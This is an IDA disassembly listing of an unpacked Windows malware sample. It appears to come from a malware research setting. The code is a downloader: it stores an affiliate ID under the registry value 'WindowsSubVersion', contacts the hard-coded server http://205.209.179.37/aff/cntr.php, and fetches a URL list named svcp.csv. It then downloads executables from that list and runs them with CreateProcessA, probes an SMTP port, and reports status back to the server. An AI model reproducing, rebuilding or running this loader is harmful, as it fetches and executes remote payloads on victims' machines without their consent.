;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9C17E76256648F2D45B3F17A640EFE4D
; ---------------------------------------------------------------------------
; File Name : u:\work\9c17e76256648f2d45b3f17a640efe4d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000EE1 ( 3809.)
; Section size in file : 00000EE1 ( 3809.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
loc_401000: ; DATA XREF: sub_401020+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: .text:0040100E�j
retn
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_401092
push [ebp+arg_0]
call sub_401D3C ; RtlUnwind
loc_401092: ; DATA XREF: sub_40107A+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40107A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_40308C, eax
mov dword_403090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_403090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_403030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_403034, eax
mov eax, [edx+4]
mov dword_403038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_40303C
mov esi, dword_403034
rep movsd
lea edi, dword_40303C
mov dword_403034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_403010, 0Bh
push 0Bh
call sub_401EB0
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_403010, 8
push 8
call sub_401EB0
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_403010
call sub_401EB0
add esp, 8
push dword_403010
call sub_401E98
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_40302C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_40302C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; DATA XREF: .idata:00404660�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40301C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_403028
push offset dword_403024
push offset dword_403020
call sub_401E08
push dword_403028
push dword_403024
push dword_403020
mov dword_403014, esp
call sub_401C28
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_401E38
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: start+212�p start+3C4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
xor edi, edi
mov [ebp+var_4], edi
mov [ebp+var_8], ebx
jmp short loc_401313
; ---------------------------------------------------------------------------
loc_4012B5: ; CODE XREF: sub_40129C+26�j
inc edi
cmp byte ptr [esi+edi], 0
jnz short loc_4012BE
xor edi, edi
loc_4012BE: ; CODE XREF: sub_40129C+1E�j
; sub_40129C+7A�j
cmp byte ptr [esi+edi], 2Eh
jz short loc_4012B5
cmp [ebp+arg_8], 0
jz short loc_4012EF
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
mov edx, eax
inc edx
mov [ebp+var_4], edx
mov edx, [ebp+var_8]
movsx ecx, byte ptr [ebx]
movsx eax, byte ptr [esi+edi]
sub eax, 30h
add ecx, eax
mov eax, ecx
mov ecx, [ebp+var_C]
mov [edx+ecx], al
jmp short loc_401312
; ---------------------------------------------------------------------------
loc_4012EF: ; CODE XREF: sub_40129C+2C�j
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
mov edx, eax
inc edx
mov [ebp+var_4], edx
mov edx, [ebp+var_8]
movsx ecx, byte ptr [ebx]
movsx eax, byte ptr [esi+edi]
sub eax, 30h
sub ecx, eax
mov eax, ecx
mov ecx, [ebp+var_10]
mov [edx+ecx], al
loc_401312: ; CODE XREF: sub_40129C+51�j
inc ebx
loc_401313: ; CODE XREF: sub_40129C+17�j
cmp byte ptr [ebx], 0
jnz short loc_4012BE
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
mov byte ptr [edx+eax], 0
mov eax, edx
pop edi
pop esi
pop ebx
leave
retn
sub_40129C endp
; ---------------------------------------------------------------------------
loc_401329: ; CODE XREF: sub_401C28+5C�p
push ebp
mov ebp, esp
sub esp, 59Ch
push ebx
push esi
push edi
and dword ptr [ebp-118h], 0
call sub_401CE8 ; GetCurrentThreadId
push eax
call sub_401EBC
pop ecx
push 104h
lea eax, [ebp-261h]
push eax
call sub_401D0C ; GetSystemDirectoryA
or eax, eax
jz short loc_401369
lea eax, [ebp-261h]
push eax
call sub_401D48 ; SetCurrentDirectoryA
loc_401369: ; CODE XREF: .text:0040135B�j
push offset aGagagaradio ; "gagagaradio"
push 0
; ---------------------------------------------------------------------------
db 68h, 1, 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_8 = dword ptr -8
pop ds
add al, ch
stosb
or [eax], eax
add [ecx+75F609C6h], cl
adc ch, [eax+2Eh]
xor al, [eax+0]
push 0
push 0
call sub_401D54 ; CreateMutexA
mov esi, eax
jmp short loc_401399
; ---------------------------------------------------------------------------
xor eax, eax
jmp loc_401BFD
; ---------------------------------------------------------------------------
loc_401399: ; CODE XREF: start+1D�j
lea eax, [ebp-3F8h]
push eax
push 2
call sub_401DF0 ; WSAStartup
or eax, eax
jz short loc_4013B5
mov eax, 2
jmp loc_401BFD
; ---------------------------------------------------------------------------
loc_4013B5: ; CODE XREF: start+36�j
push offset aUrlmon_dll ; "urlmon.dll"
call sub_401D18 ; LoadLibraryA
mov edi, eax
or edi, edi
jnz short loc_4013D2
push esi
call sub_401D30 ; ReleaseMutex
xor eax, eax
jmp loc_401BFD
; ---------------------------------------------------------------------------
loc_4013D2: ; CODE XREF: start+50�j
push offset aUrldownloadtof ; "URLDownloadToFileA"
push edi
call sub_401D00 ; GetProcAddress
mov ds:dword_402000, eax
test eax, eax
jnz short loc_4013F3
push esi
call sub_401D30 ; ReleaseMutex
xor eax, eax
jmp loc_401BFD
; ---------------------------------------------------------------------------
loc_4013F3: ; CODE XREF: start+71�j
and dword ptr [ebp-15Ch], 0
lea eax, [ebp-150h]
push eax
push 20019h
push 0
push offset byte_4032C2
push 80000001h
call sub_401D9C ; RegOpenKeyExA
or eax, eax
jnz short loc_401452
mov dword ptr [ebp-3FCh], 4
lea eax, [ebp-3FCh]
push eax
lea eax, [ebp-15Ch]
push eax
push 0
push 0
push offset aWindowssubvers ; "WindowsSubVersion"
push dword ptr [ebp-150h]
call sub_401DA8 ; RegQueryValueExA
push dword ptr [ebp-150h]
call sub_401D90 ; RegCloseKey
loc_401452: ; CODE XREF: start+A6�j
xor ebx, ebx
mov [ebp-268h], ebx
cmp [ebp-15Ch], ebx
jnz short loc_4014A9
push offset byte_4032A3
push offset aWinsub_xml ; "winsub.xml"
call sub_401E68
add esp, 8
mov [ebp-3FCh], eax
test eax, eax
jz short loc_4014A9
push eax
push 4
push 1
lea eax, [ebp-268h]
push eax
call sub_401E74
add esp, 10h
cmp eax, 4
jnz short loc_40149D
mov ebx, [ebp-268h]
loc_40149D: ; CODE XREF: start+122�j
push dword ptr [ebp-3FCh]
call sub_401E44
pop ecx
loc_4014A9: ; CODE XREF: start+ED�j start+109�j
cmp [ebp-15Ch], ebx
jbe short loc_4014BF
mov eax, [ebp-15Ch]
mov [ebp-118h], eax
jmp short loc_4014C5
; ---------------------------------------------------------------------------
loc_4014BF: ; CODE XREF: start+13C�j
mov [ebp-118h], ebx
loc_4014C5: ; CODE XREF: start+14A�j
xor ebx, ebx
push offset byte_4032A1
lea eax, [ebp-14Ah]
push eax
call sub_401D6C ; lstrcpy
cmp dword ptr [ebp-118h], 0
jz short loc_40152D
push offset word_40329E
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push 0Ah
lea eax, [ebp-12Ch]
push eax
push dword ptr [ebp-118h]
call sub_401DFC
add esp, 0Ch
lea eax, [ebp-12Ch]
push eax
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset byte_40329C
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
loc_40152D: ; CODE XREF: start+16C�j
call sub_401EA4
imul edx, eax, 0C2EDh
push edx
fild dword ptr [esp+0]
add esp, 4
fdiv dbl_403294
fadd dbl_403284
mov ebx, eax
call sub_401C04
xchg eax, ebx
push 0Ah
lea eax, [ebp-111h]
push eax
push ebx
call sub_401DFC
lea eax, [ebp-111h]
push eax
lea eax, [ebp-157h]
push eax
call sub_401C8C
push 1
lea eax, [ebp-157h]
push eax
lea eax, [ebp-111h]
push eax
call sub_40129C
push offset aB ; "b="
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
lea eax, [ebp-111h]
push eax
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset byte_40329C
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset aC ; "c="
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
lea eax, [ebp-157h]
push eax
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset byte_40329C
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset aD ; "d="
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset dword_403094
lea eax, [ebp-14Ah]
push eax
call sub_401D60 ; lstrcat
push offset asc_403279 ; "|"
push offset aHttp205_209_17 ; "http://205.209.179.37/aff/cntr.php"
call sub_401ED4
add esp, 20h
mov edi, eax
mov byte ptr [ebp-32h], 0
jmp loc_401AAE
; ---------------------------------------------------------------------------
loc_401633: ; CODE XREF: start+73D�j
push edi
lea eax, [ebp-10Ah]
push eax
call sub_401D6C ; lstrcpy
lea eax, [ebp-14Ah]
push eax
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
push 0
push 0
push offset aSvcp_csv ; "svcp.csv"
lea eax, [ebp-10Ah]
push eax
push 0
call ds:dword_402000
or eax, eax
jnz loc_401AB6
push offset byte_4032A3
push offset aSvcp_csv ; "svcp.csv"
call sub_401E68
add esp, 8
mov [ebp-400h], eax
or eax, eax
jnz short loc_4016A5
push offset asc_403279 ; "|"
push 0
call sub_401ED4
add esp, 8
mov edi, eax
jmp loc_401AAE
; ---------------------------------------------------------------------------
loc_4016A5: ; CODE XREF: start+31A�j
and dword ptr [ebp-3FCh], 0
and dword ptr [ebp-404h], 0
jmp loc_401A98
; ---------------------------------------------------------------------------
loc_4016B8: ; CODE XREF: start+733�j
push dword ptr [ebp-400h]
push 96h
lea eax, [ebp-50Eh]
push eax
call sub_401E5C
add esp, 0Ch
or eax, eax
jz loc_401AB6
and dword ptr [ebp-478h], 0
jmp short loc_40170E
; ---------------------------------------------------------------------------
loc_4016E3: ; CODE XREF: start+3A9�j
mov eax, [ebp-478h]
mov al, [ebp+eax-50Eh]
cmp al, 0Ah
jz short loc_4016F8
cmp al, 0Dh
jnz short loc_401708
loc_4016F8: ; CODE XREF: start+37F�j
mov eax, [ebp-478h]
mov byte ptr [ebp+eax-50Eh], 0
jmp short loc_40171E
; ---------------------------------------------------------------------------
loc_401708: ; CODE XREF: start+383�j
inc dword ptr [ebp-478h]
loc_40170E: ; CODE XREF: start+36E�j
mov eax, [ebp-478h]
cmp byte ptr [ebp+eax-50Eh], 0
jnz short loc_4016E3
loc_40171E: ; CODE XREF: start+393�j
cmp dword ptr [ebp-3FCh], 0
jnz short loc_401754
push 0
lea eax, [ebp-111h]
push eax
lea eax, [ebp-50Eh]
push eax
call sub_40129C
add esp, 0Ch
lea eax, [ebp-50Eh]
push eax
lea eax, [ebp-42h]
push eax
call sub_401D6C ; lstrcpy
jmp loc_401A92
; ---------------------------------------------------------------------------
loc_401754: ; CODE XREF: start+3B2�j
cmp dword ptr [ebp-3FCh], 1
jnz loc_401909
cmp dword ptr [ebp-118h], 0
jnz loc_401831
push 0
lea eax, [ebp-42h]
push eax
lea eax, [ebp-50Eh]
push eax
call sub_40129C
lea eax, [ebp-50Eh]
push eax
lea eax, [ebp-12Ch]
push eax
call sub_401D6C ; lstrcpy
lea eax, [ebp-12Ch]
push eax
call sub_401E2C
mov [ebp-118h], eax
push offset aW ; "w"
push offset aWinsub_xml ; "winsub.xml"
call sub_401E68
add esp, 18h
mov [ebp-528h], eax
test eax, eax
jz short loc_4017E0
push eax
push 4
push 1
lea eax, [ebp-118h]
push eax
call sub_401E80
push dword ptr [ebp-528h]
call sub_401E44
add esp, 14h
loc_4017E0: ; CODE XREF: start+44C�j
push 0
lea eax, [ebp-150h]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset byte_4032C2
push 80000001h
call sub_401D84 ; RegCreateKeyExA
or eax, eax
jnz short loc_401831
push 4
lea eax, [ebp-118h]
push eax
push 4
push 0
push offset aWindowssubvers ; "WindowsSubVersion"
push dword ptr [ebp-150h]
call sub_401DB4 ; RegSetValueExA
push dword ptr [ebp-150h]
call sub_401D90 ; RegCloseKey
loc_401831: ; CODE XREF: start+3F5�j start+494�j
push offset asc_403274 ; "!!"
lea eax, [ebp-32h]
push eax
call sub_401D6C ; lstrcpy
lea eax, [ebp-12Ch]
push eax
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
push offset a_ ; "_"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
push offset dword_403094
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
push offset a_ ; "_"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
push 0
push 1
push 2
call sub_401DD8 ; socket
mov [ebp-514h], eax
test eax, eax
jz short loc_4018F6
mov word ptr [ebp-524h], 2
push 19h
call sub_401DCC ; htons
mov edx, eax
mov [ebp-522h], dx
push offset a64_233_185_114 ; "64.233.185.114"
call sub_401DC0 ; inet_addr
mov [ebp-520h], eax
push 10h
lea eax, [ebp-524h]
push eax
push dword ptr [ebp-514h]
call sub_401DE4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4018E3
push offset a0 ; "0"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
jmp loc_401A92
; ---------------------------------------------------------------------------
loc_4018E3: ; CODE XREF: start+55B�j
push offset a1 ; "1"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
jmp loc_401A92
; ---------------------------------------------------------------------------
loc_4018F6: ; CODE XREF: start+519�j
push offset a0 ; "0"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
jmp loc_401A92
; ---------------------------------------------------------------------------
loc_401909: ; CODE XREF: start+3E8�j
push 0
lea eax, [ebp-42h]
push eax
lea eax, [ebp-50Eh]
push eax
call sub_40129C
add esp, 0Ch
cmp dword ptr [ebp-404h], 0
jnz short loc_401949
lea eax, [ebp-50Eh]
push eax
lea eax, [ebp-472h]
push eax
call sub_401D6C ; lstrcpy
mov dword ptr [ebp-404h], 1
jmp loc_401A92
; ---------------------------------------------------------------------------
loc_401949: ; CODE XREF: start+5B2�j
lea eax, [ebp-50Eh]
push eax
lea eax, [ebp-468h]
push eax
call sub_401D6C ; lstrcpy
lea eax, [ebp-468h]
mov [ebp-514h], eax
jmp short loc_401970
; ---------------------------------------------------------------------------
loc_40196A: ; CODE XREF: start+606�j
inc dword ptr [ebp-514h]
loc_401970: ; CODE XREF: start+5F5�j
mov eax, [ebp-514h]
cmp byte ptr [eax], 0
jnz short loc_40196A
jmp short loc_401983
; ---------------------------------------------------------------------------
loc_40197D: ; CODE XREF: start+619�j
dec dword ptr [ebp-514h]
loc_401983: ; CODE XREF: start+608�j
mov eax, [ebp-514h]
cmp byte ptr [eax], 2Fh
jnz short loc_40197D
inc dword ptr [ebp-514h]
push dword ptr [ebp-514h]
lea eax, [ebp-546h]
push eax
call sub_401D6C ; lstrcpy
push offset a_exe ; ".exe"
lea eax, [ebp-546h]
push eax
call sub_401D60 ; lstrcat
push offset a_ ; "_"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
lea eax, [ebp-472h]
push eax
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
push offset a_ ; "_"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
push 0
push 0
lea eax, [ebp-546h]
push eax
lea eax, [ebp-468h]
push eax
push 0
call ds:dword_402000
or eax, eax
jnz short loc_401A7D
push 44h
push 0
lea eax, [ebp-58Ah]
push eax
call sub_401E8C
add esp, 0Ch
mov dword ptr [ebp-58Ah], 44h
mov dword ptr [ebp-55Eh], 1
mov word ptr [ebp-55Ah], 0
lea eax, [ebp-59Ah]
push eax
lea eax, [ebp-58Ah]
push eax
push 0
push 0
push 28h
push 0
push 0
push 0
lea eax, [ebp-546h]
push eax
push 0
call sub_401D78 ; CreateProcessA
or eax, eax
jz short loc_401A6D
push offset a1 ; "1"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
jmp short loc_401A8B
; ---------------------------------------------------------------------------
loc_401A6D: ; CODE XREF: start+6E8�j
push offset a2 ; "2"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
jmp short loc_401A8B
; ---------------------------------------------------------------------------
loc_401A7D: ; CODE XREF: start+68C�j
push offset a3 ; "3"
lea eax, [ebp-32h]
push eax
call sub_401D60 ; lstrcat
loc_401A8B: ; CODE XREF: start+6F8�j start+708�j
and dword ptr [ebp-404h], 0
loc_401A92: ; CODE XREF: start+3DC�j start+56B�j ...
inc dword ptr [ebp-3FCh]
loc_401A98: ; CODE XREF: start+340�j
push dword ptr [ebp-400h]
call sub_401E50
pop ecx
or eax, eax
jz loc_4016B8
jmp short loc_401AB6
; ---------------------------------------------------------------------------
loc_401AAE: ; CODE XREF: start+2BB�j start+32D�j
or edi, edi
jnz loc_401633
loc_401AB6: ; CODE XREF: start+2FA�j start+361�j ...
cmp byte ptr [ebp-32h], 0
jnz short loc_401AC9
push esi
call sub_401D30 ; ReleaseMutex
xor eax, eax
jmp loc_401BFD
; ---------------------------------------------------------------------------
loc_401AC9: ; CODE XREF: start+747�j
push edi
lea eax, [ebp-10Ah]
push eax
call sub_401D6C ; lstrcpy
push offset byte_4032A1
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
push offset aE ; "e="
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
lea eax, [ebp-32h]
push eax
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
call sub_401EA4
imul edi, eax, 0C2EDh
push edi
fild [esp+8+var_8]
add esp, 4
fdiv dbl_403294
fadd dbl_403284
mov ebx, eax
call sub_401C04
xchg eax, ebx
push 0Ah
lea eax, [ebp-111h]
push eax
push ebx
call sub_401DFC
lea eax, [ebp-111h]
push eax
lea eax, [ebp-157h]
push eax
call sub_401C8C
push 1
lea eax, [ebp-157h]
push eax
lea eax, [ebp-111h]
push eax
call sub_40129C
add esp, 18h
push offset asc_40324F ; "&x="
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
lea eax, [ebp-111h]
push eax
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
push offset byte_40329C
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
push offset aY ; "y="
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
lea eax, [ebp-157h]
push eax
lea eax, [ebp-10Ah]
push eax
call sub_401D60 ; lstrcat
push 0
push 0
push offset aSvcp_csv ; "svcp.csv"
lea eax, [ebp-10Ah]
push eax
push 0
call ds:dword_402000
or eax, eax
jnz short loc_401BE8
push offset aSvcp_csv ; "svcp.csv"
call sub_401E20
pop ecx
loc_401BE8: ; CODE XREF: start+868�j start+880�j
push 0DBBA0h
call sub_401E14
pop ecx
jmp short loc_401BE8
; ---------------------------------------------------------------------------
push esi
call sub_401D30 ; ReleaseMutex
xor eax, eax
loc_401BFD: ; CODE XREF: start+21�j start+3D�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C04 proc near ; CODE XREF: start+1DA�p start+7B5�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_401C04 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C28 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_401CDC ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_401C5C
push 22h
mov eax, edi
inc eax
push eax
call sub_401EC8
add esp, 8
mov [ebp+var_4], eax
test eax, eax
jz short loc_401C77
mov edi, eax
inc edi
jmp short loc_401C54
; ---------------------------------------------------------------------------
loc_401C53: ; CODE XREF: sub_401C28+2F�j
inc edi
loc_401C54: ; CODE XREF: sub_401C28+29�j
cmp byte ptr [edi], 20h
jz short loc_401C53
jmp short loc_401C77
; ---------------------------------------------------------------------------
loc_401C5B: ; CODE XREF: sub_401C28+3E�j
inc edi
loc_401C5C: ; CODE XREF: sub_401C28+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_401C68
cmp eax, 20h
jnz short loc_401C5B
loc_401C68: ; CODE XREF: sub_401C28+39�j
jmp short loc_401C6B
; ---------------------------------------------------------------------------
loc_401C6A: ; CODE XREF: sub_401C28+4D�j
inc edi
loc_401C6B: ; CODE XREF: sub_401C28:loc_401C68�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_401C77
cmp eax, 20h
jz short loc_401C6A
loc_401C77: ; CODE XREF: sub_401C28+24�j
; sub_401C28+31�j ...
push 0
call sub_401CF4 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call loc_401329
pop edi
leave
retn
sub_401C28 endp
; =============== S U B R O U T I N E =======================================
sub_401C8C proc near ; CODE XREF: start+1FD�p start+7D8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_401C8C endp
; ---------------------------------------------------------------------------
mov edx, [esp+8]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+8]
xchg eax, esi
mov edi, [esp+4]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+4]
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401CDC proc near ; CODE XREF: sub_401C28+5�p
jmp ds:dword_404184
sub_401CDC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401CE8 proc near ; CODE XREF: .text:0040133C�p
jmp ds:dword_404188
sub_401CE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401CF4 proc near ; CODE XREF: sub_401C28+51�p
jmp ds:dword_40418C
sub_401CF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D00 proc near ; CODE XREF: start+65�p
jmp ds:dword_404190
sub_401D00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D0C proc near ; CODE XREF: .text:00401354�p
jmp ds:dword_404194
sub_401D0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D18 proc near ; CODE XREF: start+47�p
jmp ds:dword_404198
sub_401D18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; ---------------------------------------------------------------------------
jmp ds:dword_40419C
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401D30 proc near ; CODE XREF: start+53�p start+74�p ...
jmp ds:dword_4041A0
